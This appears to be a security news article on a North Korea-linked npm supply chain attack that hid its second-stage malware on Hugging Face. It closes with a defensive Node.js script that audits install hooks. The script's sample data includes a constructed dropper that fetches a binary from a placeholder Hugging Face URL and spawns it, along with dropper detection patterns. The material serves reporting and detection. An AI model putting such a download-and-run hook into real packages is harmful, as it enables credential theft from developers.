Hackers Exploit Hugging Face in Supply Chain Attack
Threat actors attributed to North Korea are using Hugging Face, a widely used platform in the AI community, to distribute malware. Rather than breaching the platform, they host second-stage malware in ordinary Hugging Face repositories, turning the site into the delivery channel and data exfiltration point for an npm supply chain attack. The campaign targets software developers worldwide.
Initial Attack Vector and Malicious Packages
The attack began with an npm package named “terminal-logger-utils,” which posed as a routine logging helper for developers. Three further packages, pretty-logger-utils, ts-logger-pack, and pinno-loggers, carried the same malicious code, so any developer who installed any of them was exposed. The malware was built to steal Telegram data, SSH keys, cryptocurrency wallets, and other sensitive material from the developer's machine.
Security researchers at OX Security identified the malicious packages and linked them to known North Korean operations. The threat actor publishes under the npm account “jpeek895,” which had already been flagged for similar activity. The payload combines keylogger, infostealer, and remote access trojan (RAT) capabilities, so a single install gives the attacker both the developer's secrets and ongoing control of the host.
Hugging Face as a Concealed Malware Host
A notable aspect of this attack is the use of Hugging Face to avoid detection. Instead of hosting the payload on attacker-controlled servers that reputation filters might block, the attackers placed the second-stage binary on Hugging Face's trusted platform. Downloads from huggingface.co look like routine model or dataset fetches, so the malicious traffic blends into normal AI development activity and is unlikely to trip domain-based security checks.
Stolen data was exfiltrated the same way, by uploading it to private datasets on Hugging Face, so the outbound traffic also looked legitimate. The npm maintainer accounts that published the dependent packages were central to spreading the infection. Developers who installed any of these packages should check their environments for compromise and treat every credential on the affected machine as exposed.
Technical Details and Security Measures
The infection starts from a postinstall hook in the package's package.json. When a developer runs npm install, the hook executes a file called utils.cjs, an obfuscated dropper that checks the victim's operating system and fetches the matching binary from Hugging Face. Because lifecycle hooks run during installation with the installing user's privileges, the dropper executes before any application code is ever imported. The downloaded binary is a Node.js Single Executable Application (SEA), a Node.js feature that bundles a script into a standalone executable, so it runs without depending on the victim's Node installation and gives the attacker full remote control of the compromised machine.
Once installed, the malware establishes persistence on Windows by creating a hidden VBS launcher and a scheduled task that runs it, with a registry Run key as a backup. It can also update itself by pulling new versions from the attacker's Hugging Face repository, so the attacker can change the payload without reinfecting the host.
Security teams are advised to remove the malware immediately, block network requests to the known indicators of compromise, rotate every key and token that was present on affected machines, and enforce two-factor authentication on the accounts those credentials protected. Developers should treat unfamiliar preinstall and postinstall scripts with suspicion and, in CI, install from a committed lockfile with npm ci and consider disabling lifecycle scripts (npm ci --ignore-scripts, or ignore-scripts=true in .npmrc). One caveat: ignore-scripts also skips the legitimate build hooks of native addons, so packages that need them must be rebuilt explicitly.
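The following Node.js script is an added example written for this article; it is not OX Security's tooling and not the attackers' code. It puts the advice above into practice by auditing installed packages for lifecycle hooks and for hook scripts that look like the dropper described earlier: a hook that branches on the platform, fetches a file from an external host such as huggingface.co, and spawns it. The package names, file contents, and URLs in the sample data are constructed, and the trait list and severity thresholds are the author's assumptions, not a published detection rule.

```javascript
'use strict';
// Added example (not from the original article, OX Security, or the attackers).
// Audits npm packages for lifecycle hooks and dropper-like hook scripts.
// Package names, file contents and URLs below are constructed sample data.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Hosts a small utility library has no reason to contact during install.
// huggingface.co is listed because this campaign used it; extend as needed.
const SUSPICIOUS_HOSTS = ['huggingface.co', 'hf.co'];

// Traits common in droppers and rare in honest install scripts (assumed list).
const DROPPER_PATTERNS = [
  { id: 'platform-branch', re: /process\.platform|os\.platform\(\)/ },
  { id: 'downloads-file', re: /https?\.get\(|\bfetch\(/ },
  { id: 'spawns-process', re: /child_process/ },
  { id: 'dynamic-eval', re: /\beval\(|\bFunction\(/ },
  { id: 'hex-obfuscation', re: /(\\x[0-9a-f]{2}){4,}/i },
];

// Collect every host named in a source string. Droppers often split URLs
// across concatenated strings, so an empty host list is not proof of safety.
function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/[^\s'"`)]+/g)) {
    try { hosts.add(new URL(m[0]).hostname.toLowerCase()); } catch { /* malformed URL */ }
  }
  return [...hosts];
}

function isSuspiciousHost(host) {
  return SUSPICIOUS_HOSTS.some(s => host === s || host.endsWith('.' + s));
}

// Score one piece of install-time code (the hook command or a file it runs).
function scanSource(label, source) {
  const hosts = extractHosts(source);
  return {
    label,
    badHosts: hosts.filter(isSuspiciousHost),
    patterns: DROPPER_PATTERNS.filter(p => p.re.test(source)).map(p => p.id),
  };
}

// pkg: parsed package.json; files: relative path -> contents for that package.
function auditPackage(pkg, files) {
  const scripts = pkg.scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter(h => scripts[h]);
  const scans = [];
  for (const hook of hooks) {
    const cmd = scripts[hook];
    scans.push(scanSource(`${hook}: ${cmd}`, cmd));
    // Also scan any file in the package that the hook command names.
    for (const [file, src] of Object.entries(files)) {
      if (cmd.includes(file)) scans.push(scanSource(file, src));
    }
  }
  const badHosts = [...new Set(scans.flatMap(s => s.badHosts))];
  const maxTraits = Math.max(0, ...scans.map(s => s.patterns.length));
  let severity = 'none';
  if (hooks.length > 0) severity = 'low';      // a hook exists: review it
  if (maxTraits >= 1) severity = 'medium';     // hook code shows dropper traits
  if (badHosts.length > 0 || maxTraits >= 3) severity = 'high';
  return { name: pkg.name, hooks, severity, badHosts, scans };
}

// Constructed sample: a clean package, a native addon with a normal build
// hook, and a package wired the way the article describes the dropper.
const SAMPLE_PACKAGES = [
  { pkg: { name: 'plain-logger', scripts: { test: 'node test.js' } },
    files: { 'index.js': 'module.exports = (m) => console.log(m);' } },
  { pkg: { name: 'native-addon', scripts: { install: 'node-gyp rebuild' } },
    files: { 'binding.gyp': '{ "targets": [] }' } },
  { pkg: { name: 'evil-logger-utils', scripts: { postinstall: 'node utils.cjs' } },
    files: {
      'utils.cjs': [
        "const https = require('https'); const { spawn } = require('child_process');",
        "const bin = process.platform === 'win32' ? 'stage2.exe' : 'stage2';",
        "https.get('https://huggingface.co/someuser/somerepo/resolve/main/' + bin, () => {});",
        "spawn(bin, [], { detached: true });",
      ].join('\n'),
      'index.js': 'module.exports = (m) => console.log(m);',
    } },
];

function auditAll(packages = SAMPLE_PACKAGES) {
  return packages.map(({ pkg, files }) => auditPackage(pkg, files));
}

for (const r of auditAll()) {
  console.log(`${r.severity.padEnd(6)} ${r.name}  hooks=[${r.hooks}]  hosts=[${r.badHosts}]`);
}
```

To run this against a real project, feed auditAll an array built by reading each node_modules/*/package.json and the files in that package directory. Expect native addons to show up as low severity because a node-gyp install hook is normal; the signal worth escalating is a hook script that combines platform branching, a download, and a spawn, or that names a host the package has no business contacting. Running npm ci --ignore-scripts stops the hook from executing but does not flag the package, so an audit like this belongs in CI alongside it.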
